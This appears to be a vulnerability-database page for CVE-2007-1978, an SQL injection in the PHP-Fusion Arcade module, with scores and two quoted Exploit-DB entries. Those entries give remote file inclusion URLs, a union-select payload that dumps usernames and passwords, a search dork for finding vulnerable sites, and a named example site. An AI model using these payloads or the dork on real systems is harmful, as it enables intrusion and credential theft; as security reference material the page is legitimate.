CVE-2007-1978
published 2007-04-12CVE-2007-1978: SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.03%
59.3th percentile
SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter in a view_game_list action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_fusion | arcade_module | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CGX 20050314 - 'pathCGX' Remote File Inclusion
exploitdb·2007-05-08
CVE-2007-2611 CGX 20050314 - 'pathCGX' Remote File Inclusion
CGX 20050314 - 'pathCGX' Remote File Inclusion
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerablites
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB
PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
exploitdb·2007-04-02
CVE-2007-1978 PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection
---
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
Bulan: xoron
xoron.biz
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
Google Dork:
/infusions/arcade/ 18.000 sites:)
Ekin0x / --> evilc0der.org <--
# milw0rm.com [2007-04-02]
No writeups or analysis indexed.
http://osvdb.org/37410http://www.vupen.com/english/advisories/2007/1205https://exchange.xforce.ibmcloud.com/vulnerabilities/33361https://www.exploit-db.com/exploits/3640http://osvdb.org/37410http://www.vupen.com/english/advisories/2007/1205https://exchange.xforce.ibmcloud.com/vulnerabilities/33361https://www.exploit-db.com/exploits/3640
2007-04-12
Published